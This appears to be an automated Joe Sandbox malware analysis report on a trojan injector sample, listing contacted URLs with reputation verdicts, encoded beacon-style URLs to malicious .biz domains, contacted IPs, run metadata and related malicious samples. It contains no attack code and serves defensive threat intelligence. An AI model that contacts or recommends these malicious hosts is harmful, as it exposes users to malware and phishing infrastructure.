                                                                                                                                                                                                      http://%s.biz/d/N?5SGOAKv7AR.exe, 5SGOAKv7AR.exe, 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmp, edsuvoov-usum.exe, edsuvoov-usum.exe, 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ww99.utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75edsuvoov-usum.exe, 00000001.00000003.2712709223.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ns.adobeexplorer.exe, 00000005.00000002.3819872573.0000000004627000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1358990371.0000000004627000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37Fedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://jwimhacdt.cm/edsuvoov-usum.exe, 00000001.00000003.3648952417.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3624526051.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3591514771.0000000000781000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3629814969.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2004705819.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://wfnsamu.st/Ledsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://quzgmnyiqyqoez.kr/edsuvoov-usum.exe, 00000001.00000003.2469264612.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2503988951.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2486261816.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2420715468.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2482148761.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2446208623.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2457792216.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449Bedsuvoov-usum.exe, 00000001.00000003.2963937281.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2446208623.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2457792216.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://uvwabzkyifixf.tk/edsuvoov-usum.exe, 00000001.00000003.2124424664.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111789785.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111460280.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2737326991.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2761481736.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2775675156.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://api.msn.com/%explorer.exe, 00000005.00000000.1360878216.0000000008B3F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2210576179.0000000008B3F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3078024513.0000000008B38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3824992663.0000000008B09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://quzgmnyiqyqoez.kredsuvoov-usum.exe, 00000001.00000003.2469264612.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2486261816.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2420715468.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2482148761.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2446208623.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2457792216.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://sgfpiiwog.tk/xyedsuvoov-usum.exe, 00000001.00000003.3648952417.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://excel.office.comjexplorer.exe, 00000005.00000000.1369884699.000000000BF1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2213041567.000000000BF1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://pdrwqa.mp/zedsuvoov-usum.exe, 00000001.00000003.3648952417.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3624526051.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3629814969.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ww99.utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E16554edsuvoov-usum.exe, 00000001.00000003.3605804760.00000000007BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ww99.utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBedsuvoov-usum.exe, 00000001.00000002.3817754289.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479Fedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553Fedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://schemas.microexplorer.exe, 00000005.00000002.3827874428.00000000091E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3823592819.00000000084D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3822536427.0000000007920000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://akpzumsigtkmmw.mp/edsuvoov-usum.exe, 00000001.00000003.3435492600.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3409196391.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3497300445.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3393132219.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3531692273.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3393274054.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3480072576.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3420778731.00000000007D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://wns.windows.com/ilable1explorer.exe, 00000005.00000002.3830834393.000000000BE77000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2213041567.000000000BE77000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1369884699.000000000BE77000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ww99.utbidet-ugeas.biz/d/N?0216856edsuvoov-usum.exe, 00000001.00000003.2004705819.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ylmed.cm/xzK0L~edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2650399591.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3063939839.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8Cedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DFedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3629814969.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2699619982.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2699979474.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404Cedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://owzuhlkauoavrg.rw/(edsuvoov-usum.exe, 00000001.00000003.2013476768.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2124424664.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111789785.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2033834278.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111460280.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2155906768.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2051722342.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2004705819.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ww99.utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFedsuvoov-usum.exe, 00000001.00000003.2699979474.00000000007D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      88.198.29.97
                                                                                                                                                                                                      		vnsudgrujuqaw.vgGermany
                                                                                                                                                                                                      		24940HETZNER-ASDEfalse
                                                                                                                                                                                                      64.70.19.203
                                                                                                                                                                                                      		taiqjio.wsUnited States
                                                                                                                                                                                                      		3561CENTURYLINK-LEGACY-SAVVISUSfalse
                                                                                                                                                                                                      172.234.222.138
                                                                                                                                                                                                      		utbidet-ugeas.bizUnited States
                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                      45.79.222.138
                                                                                                                                                                                                      		esqkgcss.phUnited States
                                                                                                                                                                                                      		63949LINODE-APLinodeLLCUStrue

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                      Analysis ID:1506041
                                                                                                                                                                                                      Start date and time:2024-09-07 15:32:57 +02:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 8m 34s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:11
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:2
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:5SGOAKv7AR.exe
                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                      Original Sample Name:Virus.Injector.ATA_virussign.com_36ec3a51b474cf8210bc02444a290499.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal100.troj.evad.winEXE@5/4@548/4
                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      • Number of executed functions: 17
                                                                                                                                                                                                      • Number of non-executed functions: 32
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      09:33:52API Interceptor2026x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                      09:33:54API Interceptor22726x Sleep call for process: edsuvoov-usum.exe modified

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      88.198.29.97Ey6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        p4C7Gm10K3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          KJEfMLiuRS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            64.70.19.203zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • blog.abconstructors.ws/wp-login.php
                                                                                                                                                                                                            gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • blog.acashmachine.ws/wp-login.php
                                                                                                                                                                                                            Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • blog.accu-personalservice.ws/wp-login.php
                                                                                                                                                                                                            file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                            • fedyanin.ws/admin.php
                                                                                                                                                                                                            BbbEtaIxAU.exeGet hashmaliciousBetabotBrowse
                                                                                                                                                                                                            • issasname.ws/xyz/abc/order.php?id=5889637
                                                                                                                                                                                                            GxELazkKkG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • enahmnhqah.ws/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk
                                                                                                                                                                                                            Readme.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ersaenrnwh.ws/imgs/krewa/nqxa.php?id=50f5gzcu&s5=3159&lip=192.168.2.5&win=Unk
                                                                                                                                                                                                            EAfIchN1gN.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ehmpeseeaa.ws/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk
                                                                                                                                                                                                            144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • xircus.ws/kin/logout.php
                                                                                                                                                                                                            Br6Pmt0MiZ.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                            • thaus.ws/6
                                                                                                                                                                                                            172.234.222.138Payment Advice - Advice RefGLV626201911]Priority payment Customer_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • przvgke.biz/enaandj
                                                                                                                                                                                                            7Y18r(155).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • fwiwk.biz/whwaujbftg
                                                                                                                                                                                                            Aa4FIfA2bn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • przvgke.biz/hdybn
                                                                                                                                                                                                            WXKMSqpxCd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • fwiwk.biz/coqpmahjmholgu
                                                                                                                                                                                                            5Ldcb3pt1n.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • przvgke.biz/anq

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            utbidet-ugeas.bizEy6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.234.222.143
                                                                                                                                                                                                            p4C7Gm10K3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 167.99.35.88
                                                                                                                                                                                                            KJEfMLiuRS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 167.99.35.88

                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            CENTURYLINK-LEGACY-SAVVISUSEy6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.70.19.203
                                                                                                                                                                                                            mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                            • 66.101.62.17
                                                                                                                                                                                                            x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                            • 206.129.31.41
                                                                                                                                                                                                            m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 205.140.235.107
                                                                                                                                                                                                            154.213.187.80-x86-2024-09-01T00_09_56.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 207.2.162.149
                                                                                                                                                                                                            95.214.27.183-x86-2024-09-02T08_52_28.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 207.48.144.72
                                                                                                                                                                                                            mirai.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 208.128.187.123
                                                                                                                                                                                                            firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.242.160.135
                                                                                                                                                                                                            firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 206.156.198.186
                                                                                                                                                                                                            firmware.arm-linux-gnueabihf.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 206.97.169.144
                                                                                                                                                                                                            LINODE-APLinodeLLCUShttps://gujgdne.themayfairgroupllc.site/?h9=KJj91Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 172.105.14.134
                                                                                                                                                                                                            http://govedge.filegear-de.meGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 45.79.244.209
                                                                                                                                                                                                            http://therulecalm.comGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                            • 192.155.90.248
                                                                                                                                                                                                            https://rznfilarmonia.ru/bitrix/redirect.php?event1&event2&event3&goto=https://agroserviceica.com/rkos/distGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.239.27.53
                                                                                                                                                                                                            http://seoattal.hosted.phplist.com/lists/lt.php?tid=fU9RVwRXBQ1dUE9QVVcFSQQDVFEVAAUABBRSUFtRUwEAAAFaUVNNAl1XU1JRVlFJAgMEXhVWUlMDFAVXAAAfVQcEUFZWBABQXAJRHgUGB1EEUVJeFVBSAlMUUAELUB8FVlcFTlFQBQdUAFNWAVYGBwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 45.33.29.14
